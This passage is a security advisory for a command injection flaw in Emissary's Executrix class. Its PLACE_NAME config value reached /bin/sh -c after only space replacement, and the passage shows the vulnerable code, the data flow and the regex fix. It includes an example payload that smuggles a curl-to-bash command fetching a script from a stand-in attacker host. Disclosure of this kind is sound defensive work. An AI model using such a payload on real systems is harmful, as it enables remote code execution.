GHSA-6c37-7w4p-jg9v

Summary

The Executrix utility class constructed shell commands by concatenating configuration-derived values — including the PLACE_NAME parameter — with insufficient sanitization. Only spaces were replaced with underscores, allowing shell metacharacters (;, |, $, `, (, ), etc.) to pass through into /bin/sh -c command execution.

Details

Vulnerable code — Executrix.java

Insufficient sanitization (line 132):

this.placeName = this.placeName.replace(' ', '_');
// ONLY replaces spaces — shell metacharacters pass through

Shell sink (line 1052–1058):

protected String[] getTimedCommand(final String c) {
    return new String[] {"/bin/sh", "-c", "ulimit -c 0; cd " + tmpNames[DIR] + "; " + c};
}

Data flow

1. PLACE_NAME is read from a configuration file
2. Executrix applies only a space-to-underscore replacement
3. The placeName is used to construct temporary directory paths (tmpNames[DIR])
4. tmpNames[DIR] is concatenated into a shell command string
5. The command is executed via /bin/sh -c

Example payload

PLACE_NAME = "test;curl attacker.com/shell.sh|bash;x"

After the original sanitization: test;curl_attacker.com/shell.sh|bash;x (semicolons, pipes, and other metacharacters preserved)

Impact

• Arbitrary command execution on the Emissary host
• Requires the ability to control configuration values (e.g., administrative access or a compromised configuration source)

Remediation

Fixed in PR #1290, merged into release 8.39.0.

The space-only replacement was replaced with an allowlist regex that strips all characters not matching [a-zA-Z0-9_-]:

protected static final Pattern INVALID_PLACE_NAME_CHARS = Pattern.compile("[^a-zA-Z0-9_-]");

protected static String cleanPlaceName(final String placeName) {
    return INVALID_PLACE_NAME_CHARS.matcher(placeName).replaceAll("_");
}

This ensures...